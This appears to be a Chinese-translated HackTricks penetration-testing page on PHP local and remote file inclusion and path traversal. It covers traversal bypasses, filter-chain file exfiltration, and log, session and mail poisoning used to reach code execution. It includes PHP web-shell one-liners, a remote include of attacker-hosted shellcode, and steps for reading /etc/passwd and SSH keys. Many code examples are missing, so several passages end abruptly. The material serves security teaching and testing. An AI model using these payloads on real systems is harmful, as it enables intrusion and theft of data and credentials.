File Inclusion/Path traversal
Last updated
Last updated
学习与实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)
加入 HackenProof Discord 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
黑客见解 参与深入探讨黑客的刺激与挑战的内容
实时黑客新闻 通过实时新闻和见解,跟上快速变化的黑客世界
最新公告 了解最新的漏洞赏金计划和重要平台更新
今天就加入我们, Discord,与顶尖黑客开始合作!
远程文件包含 (RFI): 文件从远程服务器加载(最佳:您可以编写代码,服务器将执行它)。在 php 中,这默认是 禁用 的 (allow_url_include)。 本地文件包含 (LFI): 服务器加载本地文件。
当用户以某种方式控制将被服务器加载的文件时,就会发生此漏洞。
易受攻击的 PHP 函数:require, require_once, include, include_once
一个有趣的工具来利用此漏洞:https://github.com/kurobeats/fimap
混合多个 *nix LFI 列表并添加更多路径,我创建了这个:
尝试将 /
改为 \
尝试添加 ../../../../../
一个使用多种技术查找文件 /etc/password(以检查漏洞是否存在)的列表可以在 这里 找到。
不同词表的合并:
尝试将 /
改为 \
尝试删除 C:/
并添加 ../../../../../
一个使用多种技术查找文件 /boot.ini(以检查漏洞是否存在)的列表可以在 这里 找到。
检查 Linux 的 LFI 列表。
所有示例都是针对本地文件包含,但也可以应用于远程文件包含(页面=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt)/)。
绕过在提供的字符串末尾附加更多字符(绕过:$_GET['param']."php")
这是自 PHP 5.4 起已解决
您可以使用非标准编码,例如双重 URL 编码(和其他编码):
也许后端正在检查文件夹路径:
服务器的文件系统可以通过某些技术递归地探索,以识别目录,而不仅仅是文件。此过程涉及确定目录深度并探测特定文件夹的存在。以下是实现此目标的详细方法:
确定目录深度: 通过成功获取 /etc/passwd
文件来确定当前目录的深度(适用于基于Linux的服务器)。一个示例URL可能结构如下,表示深度为三:
探测文件夹: 将怀疑的文件夹名称(例如,private
)附加到 URL,然后导航回 /etc/passwd
。额外的目录级别需要将深度增加一个:
解释结果: 服务器的响应指示文件夹是否存在:
错误 / 无输出: 文件夹 private
可能在指定位置不存在。
/etc/passwd
的内容: 确认存在 private
文件夹。
递归探索: 发现的文件夹可以使用相同的技术或传统的本地文件包含 (LFI) 方法进一步探测子目录或文件。
要探索文件系统中不同位置的目录,请相应调整有效负载。例如,要检查 /var/www/
是否包含 private
目录(假设当前目录深度为 3),请使用:
路径截断是一种用于操纵Web应用程序中文件路径的方法。它通常用于通过绕过某些安全措施来访问受限文件,这些安全措施会在文件路径的末尾附加额外字符。目标是构造一个文件路径,该路径在被安全措施修改后,仍然指向所需的文件。
在PHP中,由于文件系统的性质,文件路径的各种表示可以被视为等效。例如:
/etc/passwd
、/etc//passwd
、/etc/./passwd
和/etc/passwd/
都被视为相同的路径。
当最后6个字符为passwd
时,附加一个/
(使其变为passwd/
)不会改变目标文件。
同样,如果在文件路径后附加.php
(如shellcode.php
),在末尾添加/.
不会改变被访问的文件。
提供的示例演示了如何利用路径截断访问/etc/passwd
,这是一个由于其敏感内容(用户账户信息)而常见的目标:
在这些场景中,所需的遍历次数可能在2027左右,但这个数字可能会根据服务器的配置而有所不同。
使用点段和附加字符:遍历序列(../
)与额外的点段和字符结合使用,可以用来导航文件系统,有效地忽略服务器附加的字符串。
确定所需的遍历次数:通过反复试验,可以找到精确的../
序列数量,以导航到根目录,然后到/etc/passwd
,确保任何附加的字符串(如.php
)被中和,但所需的路径(/etc/passwd
)保持不变。
从虚假目录开始:通常的做法是以一个不存在的目录(如a/
)开始路径。这种技术作为预防措施或满足服务器路径解析逻辑的要求。
在使用路径截断技术时,了解服务器的路径解析行为和文件系统结构至关重要。每种情况可能需要不同的方法,通常需要测试以找到最有效的方式。
此漏洞在PHP 5.3中已被修复。
在php中,这默认是禁用的,因为 allow_url_include
是 关闭 的。它必须是 开启 的才能工作,在这种情况下,你可以从你的服务器包含一个PHP文件并获得RCE:
如果由于某种原因 allow_url_include
是 On,但 PHP 正在 过滤 对外部网页的访问,根据这篇文章,你可以使用例如数据协议和 base64 来解码 b64 PHP 代码并获得 RCE:
在前面的代码中,最后的 +.txt
被添加是因为攻击者需要一个以 .txt
结尾的字符串,因此字符串以它结尾,经过 b64 解码后那部分将返回垃圾数据,真正的 PHP 代码将被包含(因此被执行)。
另一个不使用 php://
协议的例子是:
在 Python 中,像这样的代码:
如果用户传递一个 绝对路径 给 file_name
,之前的路径会被移除:
根据文档,这是预期的行为:
如果一个组件是绝对路径,则所有先前的组件都会被丢弃,并从绝对路径组件继续连接。
看起来如果你在 Java 中有路径遍历并且你请求一个目录而不是文件,将返回该目录的列表。在其他语言中(据我所知)不会发生这种情况。
以下是可能容易受到本地文件包含(LFI)漏洞影响的前25个参数列表(来自链接):
PHP 过滤器允许在数据被读取或写入之前执行基本的 修改操作。过滤器分为 5 类:
string.rot13
string.toupper
string.tolower
string.strip_tags
: 从数据中移除标签(在 "<" 和 ">" 字符之间的所有内容)
请注意,这个过滤器在现代版本的 PHP 中已经消失
convert.base64-encode
convert.base64-decode
convert.quoted-printable-encode
convert.quoted-printable-decode
convert.iconv.*
: 转换为不同的编码(convert.iconv.<input_enc>.<output_enc>
)。要获取 所有支持的编码列表,请在控制台中运行:iconv -l
滥用 convert.iconv.*
转换过滤器可以 生成任意文本,这可能对写入任意文本或使函数如包含过程处理任意文本有用。有关更多信息,请查看 通过 php 过滤器的 LFI2RCE。
zlib.deflate
: 压缩内容(如果提取大量信息时很有用)
zlib.inflate
: 解压数据
mcrypt.*
: 已弃用
mdecrypt.*
: 已弃用
其他过滤器
在 php 中运行 var_dump(stream_get_filters());
可以找到几个 意外的过滤器:
consumed
dechunk
: 反转 HTTP 分块编码
convert.*
部分 "php://filter" 不区分大小写
在这篇文章中 提出了一种在不从服务器返回输出的情况下读取本地文件的技术。该技术基于 使用 php 过滤器作为 oracle 的文件布尔外泄(逐字符)。这是因为 php 过滤器可以用来使文本变得足够大,从而使 php 抛出异常。
在原始文章中可以找到该技术的详细解释,但这里是一个快速总结:
使用编码 UCS-4LE
将文本的前导字符留在开头,并使字符串的大小呈指数级增长。
这将用于生成一个 当初始字母正确猜测时非常大的文本,以至于 php 会触发一个 错误。
dechunk 过滤器将 删除所有内容,如果第一个字符不是十六进制,因此我们可以知道第一个字符是否是十六进制。
这与前一个结合(以及其他根据猜测字母的过滤器),将允许我们通过查看何时进行足够的转换使其不再是十六进制字符来猜测文本开头的字母。因为如果是十六进制,dechunk 不会删除它,初始炸弹将导致 php 错误。
编码 convert.iconv.UNICODE.CP930 将每个字母转换为下一个(因此在此编码后:a -> b)。这使我们能够发现第一个字母是否是 a
,例如,因为如果我们应用 6 次此编码 a->b->c->d->e->f->g,该字母不再是十六进制字符,因此 dechunk 不会删除它,php 错误被触发,因为它与初始炸弹相乘。
在开头使用其他转换如 rot13 可以泄露其他字符如 n, o, p, q, r(其他编码可以用于将其他字母移动到十六进制范围)。
当初始字符是数字时,需要对其进行 base64 编码并泄露前两个字母以泄露该数字。
最后一个问题是查看 如何泄露超过初始字母。通过使用顺序内存过滤器如 convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE 可以改变字符的顺序,并在文本的第一位置获取其他字母。
为了能够获取 更多数据,想法是 在开头生成 2 字节的垃圾数据,使用 convert.iconv.UTF16.UTF16,应用 UCS-4LE 使其 与接下来的 2 字节进行枢轴,并 删除数据直到垃圾数据(这将删除初始文本的前 2 字节)。继续这样做,直到达到所需的泄露位。
在文章中还泄露了一种自动执行此操作的工具:php_filters_chain_oracle_exploit。
此包装器允许访问进程打开的文件描述符。可能对外泄打开文件的内容有用:
您还可以使用 php://stdin, php://stdout 和 php://stderr 分别访问 文件描述符 0, 1 和 2(不确定这在攻击中如何有用)
上传一个包含 PHPShell 的 Zip 或 Rar 文件并访问它。 为了能够利用 rar 协议,它 需要被特别激活。
注意,此协议受 php 配置 allow_url_open
和 allow_url_include
的限制。
必须激活 Expect。您可以使用以下方式执行代码:
在POST参数中指定您的有效载荷:
一个 .phar
文件可以在 web 应用程序利用 include
等函数进行文件加载时执行 PHP 代码。下面提供的 PHP 代码片段演示了如何创建一个 .phar
文件:
要编译 .phar
文件,应执行以下命令:
在执行时,将创建一个名为 test.phar
的文件,这可能被利用来利用本地文件包含(LFI)漏洞。
在 LFI 仅执行文件读取而不执行 PHP 代码的情况下,通过 file_get_contents()
、fopen()
、file()
、file_exists()
、md5_file()
、filemtime()
或 filesize()
等函数,可以尝试利用反序列化漏洞。此漏洞与使用 phar
协议读取文件有关。
有关在 .phar
文件上下文中利用反序列化漏洞的详细理解,请参阅以下链接的文档:
Phar Deserialization Exploitation Guide
phar:// deserialization可以滥用 任何支持 php 过滤器的 PHP 中的任意文件读取 来获得 RCE。详细描述可以在 此帖子中找到.
非常简要的总结:在 PHP 堆中滥用 3 字节溢出 来 更改特定大小的空闲块链,以便能够 在任何地址写入任何内容,因此添加了一个钩子来调用 system
。
可以通过滥用更多的 php 过滤器来分配特定大小的块。
检查更多可能的 协议以包含在这里:
php://memory and php://temp — 在内存或临时文件中写入(不确定这在文件包含攻击中如何有用)
file:// — 访问本地文件系统
http:// — 访问 HTTP(s) URL
ftp:// — 访问 FTP(s) URL
zlib:// — 压缩流
glob:// — 查找匹配模式的路径名(它不返回任何可打印的内容,因此在这里并不真正有用)
ssh2:// — 安全外壳 2
ogg:// — 音频流(不适合读取任意文件)
在处理 'assert' 函数时,PHP 中的本地文件包含(LFI)风险显著较高,因为它可以在字符串中执行代码。如果输入包含目录遍历字符如 ".." 被检查但未正确清理,这尤其成问题。
例如,PHP 代码可能被设计为防止目录遍历,如下所示:
虽然这旨在阻止遍历,但不经意间创建了代码注入的向量。为了利用这一点读取文件内容,攻击者可以使用:
同样,对于执行任意系统命令,可以使用:
重要的是要对这些有效载荷进行URL编码。
加入HackenProof Discord服务器,与经验丰富的黑客和漏洞赏金猎人交流!
黑客见解 参与深入探讨黑客的刺激与挑战的内容
实时黑客新闻 通过实时新闻和见解,跟上快速变化的黑客世界
最新公告 了解最新的漏洞赏金发布和重要平台更新
加入我们 Discord,今天就开始与顶级黑客合作吧!
此技术适用于您控制一个PHP函数的文件路径的情况,该函数将访问一个文件但您看不到文件的内容(如简单调用**file()
**)但内容未显示。
在这篇精彩的文章中解释了如何通过PHP过滤器滥用盲路径遍历以通过错误oracle提取文件内容。
总之,该技术使用**"UCS-4LE"编码使文件内容变得如此庞大**,以至于打开该文件的PHP函数将触发一个错误。
然后,为了泄露第一个字符,使用过滤器**dechunk
,以及其他如base64或rot13**,最后使用过滤器convert.iconv.UCS-4.UCS-4LE和convert.iconv.UTF16.UTF-16BE来在开头放置其他字符并泄露它们。
可能存在漏洞的函数:file_get_contents
, readfile
, finfo->file
, getimagesize
, md5_file
, sha1_file
, hash_file
, file
, parse_ini_file
, copy
, file_put_contents (仅限目标只读)
, stream_get_contents
, fgets
, fread
, fgetc
, fgetcsv
, fpassthru
, fputs
有关技术细节,请查看上述文章!
如前所述,请点击此链接。
如果Apache或Nginx服务器在包含函数中易受LFI攻击,您可以尝试访问**/var/log/apache2/access.log
或/var/log/nginx/access.log
,在用户代理或GET参数中设置一个php shell,如<?php system($_GET['c']); ?>
**并包含该文件。
请注意,如果您为shell使用双引号而不是单引号,双引号将被修改为字符串"quote;",PHP将在那里抛出错误,并且不会执行其他任何内容。
此外,请确保正确编写有效载荷,否则PHP每次尝试加载日志文件时都会出错,您将没有第二次机会。
这也可以在其他日志中完成,但**请小心,日志中的代码可能被URL编码,这可能会破坏Shell。头部授权 "basic"**包含"用户:密码"的Base64编码,并在日志中解码。PHPShell可以插入到此头部中。 其他可能的日志路径:
Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
发送邮件到内部账户 (user@localhost),包含你的 PHP 负载,如 <?php echo system($_REQUEST["cmd"]); ?>
,并尝试包含用户的邮件,路径如 /var/mail/<USERNAME>
或 /var/spool/mail/<USERNAME>
上传大量的 shell(例如:100)
包含 http://example.com/index.php?page=/proc/$PID/fd/$FD,其中 $PID = 进程的 PID(可以暴力破解),$FD 是文件描述符(也可以暴力破解)
像日志文件一样,在 User-Agent 中发送负载,它将反映在 /proc/self/environ 文件中
如果您可以上传文件,只需在其中注入 shell 负载 (例如:<?php system($_GET['c']); ?>
)。
为了保持文件的可读性,最好将其注入到图片/doc/pdf 的元数据中。
上传一个包含压缩 PHP shell 的 ZIP 文件并访问:
检查网站是否使用 PHP 会话 (PHPSESSID)
在 PHP 中,这些会话存储在 /var/lib/php5/sess\[PHPSESSID]_ 文件中
将 cookie 设置为 <?php system('cat /etc/passwd');?>
使用 LFI 包含 PHP 会话文件
如果 ssh 处于活动状态,请检查正在使用的用户(/proc/self/status & /etc/passwd),并尝试访问 <HOME>/.ssh/id_rsa
FTP 服务器 vsftpd 的日志位于 /var/log/vsftpd.log。在存在本地文件包含(LFI)漏洞的情况下,并且可以访问暴露的 vsftpd 服务器,可以考虑以下步骤:
在登录过程中将 PHP 有效负载注入到用户名字段中。
注入后,利用 LFI 从 /var/log/vsftpd.log 检索服务器日志。
正如 这篇 文章所示,PHP base64 过滤器只会忽略非 base64。您可以利用这一点绕过文件扩展名检查:如果您提供以 ".php" 结尾的 base64,它只会忽略 "." 并将 "php" 附加到 base64。以下是一个有效负载示例:
这个 写作 解释了你可以使用 php 过滤器生成任意内容 作为输出。这基本上意味着你可以 生成任意的 php 代码 进行包含 而无需将其写入 文件。
LFI2RCE via PHP Filters上传 一个将被存储为 临时 文件在 /tmp
,然后在 同一请求中 触发 段错误,然后 临时文件将不会被删除,你可以搜索它。
如果你发现了 本地文件包含 并且 Nginx 在 PHP 前面运行,你可能能够通过以下技术获得 RCE:
LFI2RCE via Nginx temp files如果你发现了 本地文件包含 即使你 没有会话 并且 session.auto_start
是 Off
。如果你在 multipart POST 数据中提供 PHP_SESSION_UPLOAD_PROGRESS
,PHP 将 为你启用会话。你可以利用这一点获得 RCE:
如果你发现了 本地文件包含 并且服务器在 Windows 中运行,你可能会获得 RCE:
LFI2RCE Via temp file uploadspearcmd.php
+ URL 参数正如 在这篇文章中解释的,脚本 /usr/local/lib/phppearcmd.php
在 php docker 镜像中默认存在。此外,可以通过 URL 向脚本传递参数,因为它表明如果 URL 参数没有 =
,则应将其用作参数。
以下请求在 /tmp/hello.php
中创建一个内容为 <?=phpinfo()?>
的文件:
以下利用CRLF漏洞获取RCE(来自这里):
如果你发现了 Local File Inclusion 并且有一个暴露 phpinfo() 的文件,且 file_uploads = on,你可以获得 RCE:
LFI2RCE via phpinfo()PHP_STREAM_PREFER_STUDIO
+ 路径泄露如果你发现了 Local File Inclusion 并且你 可以提取临时文件的路径,但 服务器 正在 检查 要包含的 文件是否有 PHP 标记,你可以尝试通过这个 竞争条件 来 绕过该检查:
LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure如果你可以利用 LFI 来 上传临时文件 并使服务器 挂起 PHP 执行,你可以 在数小时内暴力破解文件名 来找到临时文件:
LFI2RCE via Eternal waiting如果你包含任何文件 /usr/bin/phar
、/usr/bin/phar7
、/usr/bin/phar.phar7
、/usr/bin/phar.phar
。 (你需要包含同一个文件 2 次以引发该错误)。
我不知道这有什么用,但可能会有用。 即使你导致 PHP 致命错误,上传的 PHP 临时文件也会被删除。
加入 HackenProof Discord 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
黑客见解 参与深入探讨黑客的刺激与挑战的内容
实时黑客新闻 通过实时新闻和见解,跟上快速变化的黑客世界
最新公告 了解最新的漏洞赏金计划和重要平台更新
加入我们 Discord,今天就开始与顶级黑客合作!
学习与实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术: HackTricks 培训 GCP 红队专家 (GRTE)